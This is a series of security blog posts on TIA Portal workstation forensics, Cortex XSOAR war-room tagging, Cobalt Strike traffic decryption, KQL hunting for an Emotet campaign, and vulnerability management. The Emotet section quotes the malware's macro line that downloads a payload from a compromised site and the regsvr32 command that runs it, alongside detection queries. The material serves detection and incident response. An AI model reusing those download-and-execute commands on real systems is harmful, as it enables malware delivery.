Here you can clearly see that we can parse out entries related to “.ap15_1” files for “Quick Access” and also for an App ID not known to JLECmd. This App ID is related to the TIA Portal, and we can now also identify the automatic destinations file to open or parse if we want or need to. In our case it is “4c28c7c161e44256.automaticDestinations-ms”, stored under “C:\Users\nviso\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations”. If a project is created and saved in the TIA Portal, it will not show up in the Jump List. Further, if you choose to open a project from the “Recently used” projects list, as described above, the Jump List of the TIA Portal will not be changed.

Figure 9: TIA Portal Recently used projects vs. Jump List

In figure 9 we demonstrate the potential differences between the Jump List (1.) and the “Recently used” projects in the TIA Portal (2.). Obviously, the two most recent projects listed by the TIA Portal are missing from the Jump List. The “testproject12.ap15_1” file relates to an already existing project opened via the TIA Portal functionality, and the “Pro_dev_C64_blast” project was created via the TIA Portal. The content of the Jump List is shown via the Windows Start menu in this example. Reviewing the Jump List with JLECmd validates these results.
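When many Jump Lists have to be triaged, the Timeline Explorer filter can also be replicated against JLECmd’s CSV export with a few lines of Python. The “Path” column name is an assumption for illustration; check the header of your actual JLECmd export:

```python
import csv
import io
import os

def ap_project_entries(jlecmd_csv: str, column: str = "Path") -> list:
    """Return jump list target paths whose extension starts with .ap (e.g. .ap15_1)."""
    reader = csv.DictReader(io.StringIO(jlecmd_csv))
    return [row[column] for row in reader
            if os.path.splitext(row.get(column, ""))[1].lower().startswith(".ap")]

# Fabricated two-row export for illustration
sample = ("Path,AppId\n"
          "C:\\Users\\nviso\\Documents\\Automation\\testproject_09.ap15_1,4c28c7c161e44256\n"
          "C:\\temp\\notes.txt,faa3ba\n")
print(ap_project_entries(sample))  # only the .ap15_1 entry remains
```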

The OpenSaveMRU, also user account specific evidence, is another place where we can look for the “.ap*” file extension and review activity. Opening the NTUSER.dat for the user account in focus and following the path down to the “OpenSavePidlMRU” key already shows the subkey for a file extension of interest. As always, you need to be aware of the evidence you are looking at: the OpenSaveMRU is maintained by the Windows shell dialog box, so projects will only show up here if they are opened or saved via that dialog box. Double-clicking a “.ap15_1” file will not make it show up here; luckily for us, we have the Jump List and the “RecentDocs” key mentioned above. Also note that opening a project via the “Recently used” projects list of the TIA Portal, mentioned above in the section discussing “RecentDocs”, will not change the OpenSaveMRU.

Figure 10: OpenSaveMRU key containing subkeys for ap15_1 files

Needless to say, you can also search the $MFT for files with the extension of interest.

A few things need to be mentioned with regard to managing expectations:

  • The evidence produced by the Windows Operating System or the TIA Portal is not there for forensic or incident response investigations. It usually serves a different purpose than we are using it for. That being said, it should be understood that evidence might behave completely differently after software updates or in older/newer versions of the software.
  • Further it is not guaranteed that the software will produce the same evidence in any imaginable edge case.
  • The blog posts are based on our observations and testing results.

Conclusion & Outlook

The standard evidence on a Windows system can already bring some good insights into activities around the TIA Portal. However, we must be aware that the TIA Portal offers its own functions for opening and creating projects, which do not update the Jump List, for example. For these cases we can review the “Settings.xml” file. We will focus on the “Settings.xml” file and the information we can get out of raw project files in the upcoming blog posts.

About the Author

Olaf Schwarz is a Senior Incident Response Consultant at NVISO. You can find Olaf on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Cortex XSOAR Tips & Tricks – Tagging War Room Entries

By: wstinkens
16 March 2022 at 09:00


The war room in Cortex XSOAR incidents allows a SOC analyst to do additional investigations by using any command available as an automation or integration command. It also contains the output of all tasks used in playbooks (if not in Quiet mode). In this blogpost we will show you how to format output of automations to the war room using the CommandResults class in CommonServerPython, how to add tags to this output and what you can do with these tags.

To support creating tagged war room entries in automations, we have created our own nitro_return_tagged_command_results function which is available on the NVISO Github:


The CommonServerPython automation in Cortex XSOAR contains common Python functions and classes created by Palo Alto that are used in multiple built-in automations. They are appended to the code of each integration/automation before being executed.

One of these classes is CommandResults. Together with the return_results function, it can be used to return (formatted) output from an automation to the war room or context data:

results = [
    {
        'FileName': 'malware.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Detected'
    },
    {
        'FileName': 'evil.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Prevented'
    }
]
title = "Malware Mitigation Status"

command_result = CommandResults(readable_output=tableToMarkdown(title, results, None, removeNull=True),
                                outputs_prefix='MalwareStatus',  # example prefix
                                outputs=results)
return_results(command_result)


By using the outputs_prefix and outputs attributes of the CommandResult class, the following data is created in the Context Data:

By using the readable_output attributes of the CommandResult class, the following entry to the war room is created:

By using the actions menu of the war room entry, you can manually add tags:


The functionality to add tags to war room entries is not available in the return_results function in CommonServerPython, so we created a nitro_return_tagged_command_result function which supports adding tags:

def nitro_return_tagged_command_results(command_result: CommandResults, tags: list):
    """
    Return tagged CommandResults

    :type command_result: ``CommandResults``
    :param command_result: CommandResults object to output with tags
    :type tags: ``list``
    :param tags: List of tags to add to war room entry
    """
    result = command_result.to_context()
    result['Tags'] = tags
    demisto.results(result)


This function allows you to provide tags which will be automatically added to the war room entry:

results = [
    {
        'FileName': 'malware.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Detected'
    },
    {
        'FileName': 'evil.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Prevented'
    }
]
tags_to_add = ['evidence', 'malware']
title = "Malware Mitigation Status"

command_result = CommandResults(
        readable_output=tableToMarkdown(title, results, None, removeNull=True))

nitro_return_tagged_command_results(command_result=command_result, tags=tags_to_add)

We have added this custom function to the CommonServerUserPython automation. This automation is created for user-defined code that is merged into each script and integration during execution. It will allow you to use nitro_return_tagged_command_results in all your custom automations.

Using Entry Tags

Now that you have created tagged war room entries from an automation, what can you do with this?

We use these tagged war room entries to automatically add output from automations as evidence to the incident Evidence Board. The Evidence board can be used by the analyst to store key artifacts for current and future analysis.

First we use the getEntries command to search the war room for the entries with the “evidence” tag.

results = nitro_execute_command(command='getEntries', args={'filter': {'tags': 'evidence'}})

Then we get the entry IDs from the results of getEntries:

entry_ids = [result.get('ID') for result in results]

Finally we loop through all entry IDs of the tagged war room entries and use the AddEvidence command to add them to the evidence board:

for entry_id in entry_ids:
    nitro_execute_command(command='AddEvidence', args={'entryIDs': entry_id, 'desc': 'Example Evidence'})

The tagged war room entry will now be added to the Evidence Board of the incident:
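Putting the three steps together, the logic can be captured in one small helper. This is an illustrative sketch, not the exact NVISO implementation: run_command stands in for nitro_execute_command so the flow can be demonstrated outside of XSOAR.

```python
def add_tagged_entries_as_evidence(run_command, tag: str, description: str) -> list:
    """Search the war room for entries carrying `tag` and add each to the Evidence Board."""
    results = run_command('getEntries', {'filter': {'tags': tag}})
    entry_ids = [entry.get('ID') for entry in results]
    for entry_id in entry_ids:
        run_command('AddEvidence', {'entryIDs': entry_id, 'desc': description})
    return entry_ids

# Demonstration with a fake executor (outside XSOAR)
def fake_run_command(command, args):
    if command == 'getEntries':
        return [{'ID': '4@101'}, {'ID': '7@101'}]
    return []

print(add_tagged_entries_as_evidence(fake_run_command, 'evidence', 'Example Evidence'))  # ['4@101', '7@101']
```

Inside an automation you would pass nitro_execute_command itself as the executor.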


About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the lead engineer and development process lead he is responsible for the design, development and deployment of automated analysis workflows created by the SOAR Engineering team to enable the NVISO SOC analyst to faster detect attackers in customers environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

You can reach Wouter via his LinkedIn page.

Want to learn more about SOAR? Sign up here and we will inform you about new content and invite you to our SOAR For Fun and Profit webcast.

Cobalt Strike: Overview – Part 7

22 March 2022 at 09:04

This is an overview of a series of 6 blog posts we dedicated to the analysis and decryption of Cobalt Strike traffic. We include videos for different analysis methods.

In part 1, we explain that Cobalt Strike traffic is encrypted using RSA and AES cryptography, and that we found private RSA keys that can help with decryption of Cobalt Strike traffic

In part 2, we actually decrypt traffic using private keys. Notice that one of the free, open source tools we created to decrypt Cobalt Strike traffic was a beta release. It has since been replaced by a new tool that is capable of decrypting HTTP(S) and DNS traffic; for HTTP(S), it is a drop-in replacement for the beta tool.

In part 3, we use process memory dumps to extract the decryption keys. This is for use cases where we don’t have the private keys.

In part 4, we deal with some specific obfuscation: data transforms of encrypted traffic, and sleep mode in beacons’ process memory.

In part 5, we handle Cobalt Strike DNS traffic.

And finally, in part 6, we provide some tips to make memory dumps of Cobalt Strike beacons.

The tools used in these blog posts are free and open source, and can be found here.

Here are a couple of videos that illustrate the methods discussed in this series:

YouTube playlist “Cobalt Strike: Decrypting Traffic”

Blog posts in this series:

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Hunting Emotet campaigns with Kusto

By: bparys
23 March 2022 at 15:07


Emotet doesn’t need an introduction anymore – it is one of the more prolific cybercriminal gangs and has been around for many years. In January 2021, a disruption effort took place via Europol and other law enforcement authorities to take Emotet down for good. [1] Indeed, there was a significant decrease in Emotet malicious spam (malspam) and phishing campaigns for the next few months after the takedown event.

In November 2021 however, Emotet had returned [2] and is once again targeting organisations on a global scale across multiple sectors.

Starting March 10th 2022, we detected a massive malspam campaign that delivers Emotet (and further payloads) via encrypted (password-protected) ZIP files. The campaign continues as of the writing of this blog post on March 23rd, although it appears to be decreasing in frequency. The campaign appears to be initiated by Emotet’s Epoch4 and (mainly) Epoch5 botnet nodes.

In this blog post, we will first have a look at the particular Emotet campaign, and expand on detection and hunting rules using the Kusto Query Language (KQL).

Emotet Campaign

The malspam campaign itself has the following pattern:

  1. An organisation’s email server is abused / compromised to send the initial email
  2. The email has a spoofed display name, purporting to be legitimate
  3. The subject of the email is a reply “RE:” or forward “FW:” and contains the recipient’s email address
  4. The body of the email contains only a few single sentences and a password to open the attachment
  5. The attachment is an encrypted ZIP file, likely an attempt to evade detections, which in turn contains a macro-enabled Excel document (.XLSM)
  6. The Excel will in turn download the Emotet payload
  7. Finally, Emotet may download one of the next stages (e.g. CobaltStrike, SystemBC, or other malware)

Two examples of the email received can be observed in Figure 1. Note the target email address in the subject.

Figure 1 – Two example malspam emails

We have observed emails sent in multiple languages, including, but not limited to: Spanish, Portuguese, German, French, English and Dutch.

The malspam emails are typically sent from compromised email servers across multiple organisations. Some of the top sending domains (based on country code) observed are shown in Figure 2.

Figure 2 – Top sender (compromised) email domains

The attachment naming scheme follows a somewhat irregular pattern: split between text and seemingly random numbers, again potentially to evade detection. A few examples of the text prepended to attachment names are shown in Figure 3.

Figure 3 – Example attachment names

After opening the attachment with the password provided (typically a 3-4 character password), an Excel file with the same name as the ZIP is observed. When opening the Excel file, we are presented with the usual banner to Enable Macros to make use of all features, as can be seen in Figure 4.

Figure 4 – Low effort Excel dropper

After enabling macros, an XLM 4.0 macro in a hidden sheet or cell executes the following:

=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://<compromised_website>/0Rq5zobAZB/", "..\wn.ocx")

This will then result in regsvr32 executing the downloaded OCX file (a DLL):

C:\Windows\SysWow64\regsvr32.exe -s ..\en.ocx

This OCX file is in turn the Emotet payload. Emotet can then, as mentioned, either leverage one of its modules (plugins) for data exfiltration, or download the next malware stage as part of its attack campaign.

We will not analyse the Emotet malware itself, but rather focus on how to hunt for several stages of the attack using the Kusto Query Language (KQL) in environments that make use of Office 365.

Hunting with KQL

Provided you are ingesting the right logs (license and setup) and have the necessary permissions (Security Reader will suffice), visit the Microsoft 365 Defender Advanced Hunting page and query builder:

Query I – Hunting the initial campaign

First, we want to track the scope and size of the initial Emotet campaign. We can build the following query:

EmailAttachmentInfo
| where FileType == "zip" and FileName endswith_cs "zip"
| join kind=inner (EmailEvents | where Subject contains RecipientEmailAddress and DeliveryAction == "Delivered" and EmailDirection == "Inbound") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress

The query above focuses on Step 3 of this campaign: The subject of the email is a reply “RE:” or forward “FW:” and contains the recipient’s email address. In this query, we filter on:

  1. Any email that has a ZIP attachment;
  2. Where the subject contains the recipient’s email address;
  3. Where the email direction is inbound and the mail is delivered (so not junked or blocked).

This yields 22% of emails that have been delivered – the others have either been blocked or junked. However, we know that this campaign is larger and might have been more successful.

Meaning, we need to improve our query. We can now create an improved query like below, where the sender display name has an alias (or is spoofed):

EmailAttachmentInfo
| where FileType == "zip" and FileName endswith_cs "zip" and SenderDisplayName startswith_cs "<"
| join kind=inner (EmailEvents | where EmailDirection == "Inbound" and DeliveryAction == "Delivered") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress

This query now results in 25% of emails that have been delivered, for the same timespan (campaign scope & size) as set before. The query can now further be finetuned to show all emails except the blocked ones. Even when malspam or phishing emails are Junked, the user may manually go to the Junk Folder, open the email / attachment and from there get compromised.

The final query:

EmailAttachmentInfo
| where FileType == "zip" and FileName endswith_cs "zip" and SenderDisplayName startswith_cs "<"
| join kind=inner (EmailEvents | where EmailDirection == "Inbound" and DeliveryAction != "Blocked") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress

This query now displays 73% of the whole Emotet malspam campaign. You can now export the result, create statistics and blocking rules, notify users and improve settings or policies where required. An additional user awareness campaign can help to stress that Junked emails should not be opened when it can be avoided.

As an extra, if you merely want to create statistics on Delivered versus Junked versus Blocked, the following query will do just that:

EmailAttachmentInfo
| where FileType == "zip" and FileName endswith_cs "zip" and SenderDisplayName startswith_cs "<"
| join kind=inner (EmailEvents | where EmailDirection == "Inbound") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress
| summarize Count = count() by DeliveryAction
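Once exported, the DeliveryAction counts from this query can be turned into percentages outside of Defender; the numbers in the example below are made up for illustration:

```python
def delivery_percentages(counts: dict) -> dict:
    """Convert DeliveryAction counts into rounded percentages of the whole campaign."""
    total = sum(counts.values())
    return {action: round(100 * n / total, 1) for action, n in counts.items()}

print(delivery_percentages({'Delivered': 22, 'Junked': 51, 'Blocked': 27}))
# {'Delivered': 22.0, 'Junked': 51.0, 'Blocked': 27.0}
```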

Query II – Filtering on malspam attachment name

This query is of lower fidelity than the others in this blog, as it can produce a large number of False Positives (FPs), depending on your organisation’s geographical location and the amount of email received. Nevertheless, it can be useful to run the query and build further on it, creating a baseline. The query below uses an extract of the attachment keywords from Table 1 and the corresponding hunt:

let attachmentname = dynamic(["adjunto","adjuntos","anhang","archiv","archivo","attachment","avis","aviso","bericht","comentarios","commentaires","comments","correo","data","datei","datos","detail","details","detalle","doc","document","documentación","documentation","documentos","documents","dokument","détails","escanear","fichier","file","filename","hinweis","info","informe","list","lista","liste","mail","mensaje","message","nachricht","notice","pack","paquete","pièce","rapport","report","scan","sin titulo","untitled"]);
EmailAttachmentInfo
| where FileName has_any(attachmentname) and strlen(FileName) < 20 and FileType == "zip"
| join EmailEvents on NetworkMessageId
| where DeliveryAction == "Delivered" and EmailDirection == "Inbound"

Running this rule delivers a considerable amount of results, even when requiring the filename length (strlen) to be less than 20 characters, as we have observed in this campaign. To fine-tune the query, we can add one more condition to filter on the display name, as we did in Query I:

let attachmentname = dynamic(["adjunto","adjuntos","anhang","archiv","archivo","attachment","avis","aviso","bericht","comentarios","commentaires","comments","correo","data","datei","datos","detail","details","detalle","doc","document","documentación","documentation","documentos","documents","dokument","détails","escanear","fichier","file","filename","hinweis","info","informe","list","lista","liste","mail","mensaje","message","nachricht","notice","pack","paquete","pièce","rapport","report","scan","sin titulo","untitled"]);
EmailAttachmentInfo
| where FileName has_any(attachmentname) and strlen(FileName) < 20 and FileType == "zip" and SenderDisplayName startswith_cs "<"
| join EmailEvents on NetworkMessageId
| where DeliveryAction == "Delivered" and EmailDirection == "Inbound"

This now results in 20% True Positives (TP) as opposed to the original query, where we would have needed to filter extensively. Note that this query can be further adapted to your needs; for example, you could remove the SenderDisplayName parameter again, and set other parameters (e.g. string length, email language, …).
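The same filter can also be approximated in Python for offline triage, e.g. against an exported list of attachment names. Note two assumptions: the keyword list below is truncated, and substring matching is used where KQL’s has_any matches whole terms:

```python
ATTACHMENT_KEYWORDS = ["adjunto", "anhang", "attachment", "data", "doc",
                       "file", "info", "report", "scan"]  # excerpt of the full list

def suspicious_attachment(filename: str) -> bool:
    """Mirror Query II: keyword hit, name shorter than 20 characters, ZIP extension."""
    name = filename.lower()
    return (name.endswith(".zip")
            and len(filename) < 20
            and any(word in name for word in ATTACHMENT_KEYWORDS))

print(suspicious_attachment("data 3994.zip"))                  # True
print(suspicious_attachment("quarterly-results-2022-q1.zip"))  # False (too long)
```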

Query III – Searching for regsvr32 doing bad things

Most detection & hunting teams, Security Operation Center (SOC) analysts, incident responders and so on will be acquainted with the term “lolbins”, also known as living off the land binaries. In short, any binary that is part of the native Operating System, in this case Windows, and which can be abused for other purposes than what it is intended for.

In this case, regsvr32 is leveraged – it is typically used by attackers to – you guessed it – register and execute DLLs! The query below will leverage a simple regular expression (regex) to hunt for execution of regsvr32 attempting to run an OCX file, as was seen in this Emotet campaign.

DeviceProcessEvents
| where FileName =~ "regsvr32.exe" and ProcessCommandLine matches regex @"\.\.\\.+\.ocx$"
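The regular expression itself can be validated in Python against the command line observed earlier, before deploying the hunt:

```python
import re

# Matches a relative ..\<name>.ocx at the end of the command line,
# as used by the Emotet Excel macro stage.
OCX_PATTERN = re.compile(r"\.\.\\.+\.ocx$")

print(bool(OCX_PATTERN.search(r"C:\Windows\SysWow64\regsvr32.exe -s ..\en.ocx")))   # True
print(bool(OCX_PATTERN.search(r"C:\Windows\System32\regsvr32.exe /s legit.dll")))   # False
```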


Emotet is still a significant threat to be reckoned with since its return near the end of last year.

This blog post focused on dissecting Emotet’s latest malspam campaign as well as creating hunting queries using KQL to hunt for and respond to any potential security incident. The queries can also be converted to other formats (e.g. Splunk Query Language) to allow for broader hunting efforts or for environments where using KQL might not be an option.

Thanks to my colleague Maxime Thiebaut (@0xthiebaut) for assistance in building the queries.

About the author

Bart Parys Bart is a manager at NVISO where he mainly focuses on Threat Intelligence, Incident Response and Malware Analysis. As an experienced consumer, curator and creator of Threat Intelligence, Bart loves to and has written many TI reports on multiple levels such as strategic and operational across a wide variety of sectors and geographies. Twitter: @bartblaze

Vulnerability Management in a nutshell

28 March 2022 at 15:00


Vulnerability Management plays an important role in an organization’s line of defense. However, setting up a Vulnerability Management process can be very time-consuming. This blogpost will briefly cover the core principles of Vulnerability Management and how it can help protect your organization against threats and adversaries looking to abuse weaknesses.

What is Vulnerability Management

To better understand Vulnerability Management, it is important to know what it stands for. On the internet, Vulnerability Management has several definitions. Sometimes these can be confusing and misinterpreted because different wording is used across several platforms. Several products exist that can assist an organization in creating a Vulnerability Management Process. Some of the current market leaders include but are not limited to: CrowdStrike, Tenable.IO and Rapid7.

According to Tenable, Vulnerability Management is an ongoing process that includes proactive asset discovery, continuous monitoring, mitigation, remediation and defense tactics to protect your organization’s modern IT attack surface from Cyber Exposure.[1]

According to Rapid7, Vulnerability Management is the process of identifying, evaluating, treating, and reporting on security vulnerabilities in systems and the software that runs on them. This, implemented alongside with other security tactics, is vital for organizations to prioritize possible threats and minimizing their attack surface.[2]

According to CrowdStrike, Vulnerability Management means the ongoing, regular process of identifying, assessing, reporting on, managing and remediating security vulnerabilities across endpoints, workloads, and systems. Typically, a security team will leverage a Vulnerability Management tool to detect vulnerabilities and utilize different processes to patch or remediate them.[3]

Why Vulnerability Management

A well-defined Vulnerability Management process can be leveraged to decrease the cyber exposure of an organization. This ranges from identifying open RDP ports on internet-facing Shadow IT to outdated third-party software installed on the domain controller. If vulnerabilities are abused by attackers, they could obtain access to the internal network, distribute malware such as ransomware, obtain sensitive information, and so on. Decreasing your exposure and improving patch management can reduce the likelihood of an attack on the organization’s infrastructure.

Vulnerability Management core principles

If we take a look at the definitions above, several terms are being used over and over again. We can summarize Vulnerability Management in 6 steps. As Vulnerability Management is a continuous process, each individual step provides input for subsequent steps. It is important to note that this is a simplified version of Vulnerability Management. The following image illustrates what a Vulnerability Management process can look like:

Figure 1 – Vulnerability Management Process


Identification of the scope is the first part of the Vulnerability Management cycle. This is an important phase, as you can’t protect what you don’t know. If we take a look at the CIS Critical Security Controls[4], the first step to stop today’s most pervasive and dangerous attacks is to “Actively manage (inventory, track, and correct) all enterprise assets“ – meaning that it is really important for an organization to know what infrastructure they have. The first step in the Vulnerability Management program is to identify all known and unknown assets and start prioritizing them. This can include but is not limited to the following information:

  • Which assets are most critical to the business?
  • Which assets are externally exposed?
  • Which assets have confidential information?

The process of identifying assets can be automated with a combination of discovery scans on the internal network and identification of known and unknown external assets through attack surface management platforms. This phase is a crucial part, as all next steps are based on the scope defined during the identification phase.


Assessing the infrastructure for weaknesses can be automated through vulnerability scanning with known scanners such as Tenable.IO and Rapid7. However, manual verification might be needed to determine the actual exploitability of vulnerabilities, as vulnerability scanners do not cover all security controls in place, such as specific workarounds that were implemented to limit the likelihood of exploitation. By using a combination of automated scanners and manual verification of the issues, a comprehensive view of what vulnerabilities are currently affecting your organization can be established.


Some organizations might not prioritize their vulnerabilities obtained by automatic scanners or penetration tests. However, as Seth Godin said: “Data is not useful until it becomes information”. It is the task of the Vulnerability Management team to prioritize the vulnerabilities not only on their actual technical impact but also to keep the business impact in mind. For example, a critical Log4J vulnerability on an externally available and well-known website should be remediated sooner than the same Log4J vulnerability on a lunch-serving testing server that is only accessible from the internal network.


After all issues have been prioritized, an actionable report should be given to the teams that will actually perform the patching/resolving of the issues. It is important for the Vulnerability Management team to keep in mind that they should create actionable tickets or remediating actions for the operations team. A bad example of a ticket can be as follows:

Title: Log4J identified

Description: Log4J was identified on your server

Resolution: Please fix this as soon as possible

A good example of a ticket can be something like this[5]:

Title: Apache Log4j Remote Code Execution (Log4Shell)

Severity: Critical

Estimated Time to Fix: 1 hour

Description: Apache Log4j is an open source Java-based logging framework leveraged within numerous Java applications. Apache Log4j versions 2.0-beta9 to 2.15.0 suffer from insufficient protections on message lookup substitutions when dealing with user controlled input. By crafting a malicious string, an attacker could leverage this issue to achieve a remote code execution on the Log4j instance used by the target application.

Solution: Upgrade Apache Log4j to version 2.16.0 or later.

Affected devices:,

CVEs: CVE-2021-44228
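The difference between the two tickets can even be checked programmatically before they reach the operations team; the required field names below are our own convention, not a standard:

```python
REQUIRED_FIELDS = ("Title", "Severity", "Estimated Time to Fix",
                   "Description", "Solution", "Affected devices", "CVEs")

def is_actionable(ticket: dict) -> bool:
    """A ticket is actionable only if every required field is present and non-empty."""
    return all(ticket.get(field) for field in REQUIRED_FIELDS)

bad_ticket = {"Title": "Log4J identified",
              "Description": "Log4J was identified on your server"}
print(is_actionable(bad_ticket))  # False
```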



Resolving vulnerabilities should be the goal of the entire Vulnerability Management process, as this will decrease the exposure of your organization. Remediation is a process on its own and might consist of automatic patching, process updates, Group Policy updates, …. With the actionable ticketing performed by the Vulnerability Management team in the previous phase, it should be easy for the operations teams to identify what actions need to be done and how long it will take. After successful remediation, a validation of the remediation should be performed by the Vulnerability Management team. If the issue is resolved, the issue can be closed.


As Vulnerability Management is a continuous process, it should be reviewed all the time. Like Rome, a Vulnerability Management program is not built in one day. However, over time a robust and reliable Vulnerability Management process will be in place if the processes are well defined and known within the organization.






Investigating an engineering workstation – Part 2

30 March 2022 at 08:00

In this second post we will focus on specific evidence written by the TIA Portal. As you might remember, in the first part we covered standard Windows-based artefacts regarding execution of the TIA Portal and usage of projects.

The TIA Portal maintains a file called “Settings.xml” under the following path: C:\Users\$USERNAME\AppData\Roaming\Siemens\Portal V15_1\Settings\. Please remember we used version 15.1 only. The path contains the version number for the TIA Portal, so at least the path will most likely change for different versions. It is also possible that the content and the behaviour of the nodes discussed below changes with different versions of the TIA Portal.

The file can be investigated with a text editor of your choice as it has a plain XML structure. Many nodes contain readable strings, although there are some exceptions that contain encoded binary data.  

A few nodes are of specific interest:

  • “LastOpenedProject”
  • “LRUProjectStorageLocation”
  • “LRUProjectArchiveStorageLocation”
  • “LastProjects”
  • “ConnectionServices”
  • “LoadServices”

We will look at each of these nodes, what information they contain and how they behaved in our testing. As the file is present for a specific user, everything in it is related to that specific user account. So if we state that some information represents the last opened project, it is meant for the specific user the Settings.xml file belongs to and not globally for the entire system.


Figure 1: Settings.xml LastOpenedProject node

This node is located under the SettingNode named “General” and contains one child node. As you can see from the screenshot above, this child node is a full path to an “.ap15_1” file. As the name already implies, this is the last project opened with the TIA Portal. In this example, the project root folder is “testproject_09”, the storage location of the project is “C:\Users\nviso\Documents\Automation\”, and the file used to open the project is “testproject_09.ap15_1”.


Last opened project

  • If the TIA Portal is opened and closed without opening a project, the child node will be empty. This also represents exactly what happened: no project was opened.
  • The value is not affected if a project is removed from the recently used projects in the TIA Portal. Removing a project from this list is a native built-in function of the TIA Portal.
Figure 2: TIA Portal dialog to open and remove recently used projects
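Extracting such values scales to many collected Settings.xml files with a short script. The XML below is a simplified, fabricated structure for illustration; the real file’s node layout differs, so adapt the lookup to the actual schema:

```python
import xml.etree.ElementTree as ET

def last_opened_project(settings_xml: str) -> str:
    """Return the text of the first child under the LastOpenedProject setting node."""
    root = ET.fromstring(settings_xml)
    node = root.find(".//SettingNode[@Name='LastOpenedProject']")
    if node is None or len(node) == 0:
        return ""
    return node[0].text or ""

# Simplified, fabricated structure for illustration only
sample = """
<Settings>
  <SettingNode Name="General">
    <SettingNode Name="LastOpenedProject">
      <Value>C:\\Users\\nviso\\Documents\\Automation\\testproject_09\\testproject_09.ap15_1</Value>
    </SettingNode>
  </SettingNode>
</Settings>
"""
print(last_opened_project(sample))
```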


Figure 3: Settings.xml LRUProjectStorageLocation node

This node is located under the SettingNode named “General”, as a neighbour of the “LastOpenedProject” node we discussed earlier. It also contains only one child node, representing the path to the location where the most recently opened project is stored; more precisely, the location of the root folder of the project.


Path to folder containing the most recently opened project

  • The value of the child node is not affected if the TIA Portal is opened & closed without opening any project.
  • The value is not affected if a project is removed from the recently used projects in the TIA Portal.


Figure 4: Settings.xml LRUProjectArchiveStorageLocation node

This node is located under the SettingNode named “General”, as a neighbour of the “LastOpenedProject” node we discussed earlier. If a project file is opened in the TIA Portal and the archive function is used (Main menu bar: Project -> Archive…), the full path to the folder specified in the “Target path” field is written to this value.

Figure 5: TIA Portal Archive Project Dialog

Full path to the most recent folder specified to archive a project.

  • The value is overwritten if a different location is chosen while archiving a project.
  • Unless the archive function is used, the node is not present in the “Settings.xml” file.


Figure 6: Settings.xml LastProjects node

The “LastProjects” node is a child node of the SettingsNode named “ProjectSettings”. The “ProjectSettings” node is located at the same level as the “General” node discussed earlier. As shown in the excerpt above, the node contains a list of full path entries for “.apXX” files. This list represents the opened projects in chronological order, with the most recent project on top.


Chronologically ordered list of opened projects

  • The content of this node is not affected when the TIA Portal is opened and closed without opening a project.
  • If a project is removed from the list of recently used projects, the corresponding “String” node containing the full path to the project is removed from the list. The chronological order will still be intact afterwards.
  • Entries in this list are unique. If a project already present in the list is opened again, the entry will be moved to the top position.
  • In our testing we have seen more than 10 child nodes for opened projects. We did not test for a maximum number of projects tracked in the “LastProjects” node.
  • If a new project is created and saved in the TIA Portal, it will show up in this list, but not show up in the Jump List. (We covered this in part 1 of the series)


Figure 7: Settings.xml ConnectionService node (parts have been removed for readability)

The “ConnectionService” node is a neighbour of the “ProjectSettings” and the “General” node. It contains child nodes named after the full path of projects. These child nodes can contain the creation date and time of the project in UTC, stored in a child node called “CreationTime”. Further, they can contain a child node called “ControllerConfiguration”, which might have several child nodes for configured PLCs. These PLC nodes (“{1052700-1391}” in the example above) show how to communicate with the PLC, in the node named “OamAddress”. As demonstrated in the screenshot, the “OamAddress” node can give us information like the IP address and subnet mask used to reach the PLC.


List of projects that were worked on within the TIA Portal. Under certain circumstances, the creation time of the project in UTC and connection information for configured PLCs are included.

  • The content of this node and its children is not affected when the TIA Portal is opened and closed without opening a project.
  • The content of this node and its children is not affected if a project is removed from the recently used projects in the TIA Portal.
  • A “SettingNode” entry for a specific project is not added directly after an empty project is created, nor is it added when an empty project is re-opened.
  • A “SettingNode” including the project creation timestamp in UTC is created when you start to configure the project, for example by adding a PLC to it.
  • The creation timestamp is taken from within the project, so if a project file is copied to a different host and opened there, the creation date and time of the original project is listed.
  • The “SettingNode” for a specific project is extended with a “SettingNode” named “ControllerConfiguration” if communication with a configured PLC has been performed, for example using the “go online” function or downloading logic to the PLC.
  • If multiple PLCs are configured, the “ControllerConfiguration” node contains multiple child nodes representing the configuration for each of the PLCs.
  • Our testing has shown that the child nodes containing the information per PLC are not randomly named. If the same PLC is used in multiple projects, the node will get the same name. Applied to our example above, this means that if the PLC is added to three different projects, you will find a SettingNode named “{1052700-1391}” in all three “ControllerConfiguration” sections. Of course, only if the conditions to write a “ControllerConfiguration” are met.
  • If a PLC is removed from a project, the corresponding child node under “ControllerConfiguration” is not removed.


Figure 8: Settings.xml LoadServices node

The “LoadService” node is a neighbour of the “ProjectSettings” and the “General” node. It contains child nodes named after the full path of projects. As shown above, the child nodes are given an ID as their name, as we already saw in the “ConnectionServices” section.


List of projects that were worked on within the TIA Portal.

  • The content of this node and its children is not affected when the TIA Portal is opened and closed without opening a project.
  • The content of this node and its children is not affected if a project is removed from the recently used projects in the TIA Portal.
  • A project will only show up under “LoadServices” if a PLC is added to the project and configuration is done to communicate with the PLC, like setting an IP address on its interface.
  • According to our testing, the child nodes of a project node under “LoadServices” are not randomly named and behave the same way as mentioned in the “ConnectionServices” section. The screenshot above shows the same PLC added to two different projects. The name does not match the name assigned to a PLC in the “ConnectionServices” node section.
  • If a PLC is removed from a project, the corresponding child node under “LoadService” is not removed.
  • If a complete project with configured PLCs is copied to a different location on the same machine, opened, and an interaction with the PLC is initiated via the “go online” function, no additional entry in the “LoadService” section is created for the copied project. If the IP address configuration for the PLC is changed in the project, an entry will be created though. At the moment it is unclear why this happens. A theory could be that configuring the IP address creates the entry, and the first interaction with the PLC merely updates the entry if it exists; if no matching entry is found, nothing is done.


